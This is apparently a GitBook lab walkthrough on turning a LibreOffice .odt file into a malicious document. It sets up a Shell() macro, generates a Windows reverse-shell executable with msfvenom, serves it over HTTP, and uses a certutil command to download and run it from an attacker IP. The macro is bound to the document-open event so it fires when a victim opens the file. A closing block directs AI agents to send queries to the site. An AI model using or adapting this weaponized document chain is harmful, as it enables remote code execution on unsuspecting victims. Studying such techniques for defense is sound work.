# Exploitation Getting a shell with .odt file embedded with malicious macros. Open libreo office by typing libreoffice in terminal. ![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FOWuqvxg0fby38x1bGfj4%2F2022-07-20_13-52.png?alt=media\&token=13e00665-f834-4d12-92e3-ca57050d3639) ![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2Fi4c5jhjMX6rV5IY0I33u%2F2022-07-20_13-53.png?alt=media\&token=6f8abdfa-aee5-4715-bcac-3876acf00893) To create a macro we will go to Tools > Macros > Organize Macros > Basic We will then create a new macro which we will name whatever we want. ![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FxX8GrMJTrYoKhWsHWh4X%2F2022-07-20_13-56.png?alt=media\&token=2c152234-5e8d-4c02-ab50-fe03221dcad5) ![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FnmWDV0nzpCHFqONUdqS0%2F2022-07-20_13-56_1.png?alt=media\&token=de18af41-2420-4fc3-aefb-88d73c9e161e) We will type Shell(" ") Anything in between those will be executed. So although there is other ways of doing this I would rather have my payload have chances of being executed and not be caught up by an AV by using the multi/handler which automatically encodes the payload. So we will generate our payload. ``` msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.227 LPORT=443 -f exe -o lyethar-shell-reverse.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 73802 bytes Saved as: lyethar-shell-reverse.exe ``` And start a python webserver on port 80. ``` python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` Inside the macro between the quotation marks we will paste this payload which will get our generated payload and execute it, resulting in a reverse shell. ``` Shell(“Cmd.exe C net use D Y * && cme.exe C certutil.exe -urlcache -split -f “”http://192.168.49.227:80/lyethar-shell.exe”” C:\Users\Public\lyethar.exe & C:\Users\Public\lyethar.exe”) ``` Then we save the macro. Once saved we attach the macro to an event that will execute the macro when somebody opens the file. We will go to Tools > Customize > Events > Open Document > Macro... > Nameofmacro > Standard > Main Save the FIle as odt. Upload and free money. ![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FO0f9cHikPqlJ4C04NxlN%2F2022-07-20_14-09.png?alt=media\&token=e0728ac9-0a55-4afb-bfce-a8a552557b3f) Code execution. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lyethar.gitbook.io/craft/exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.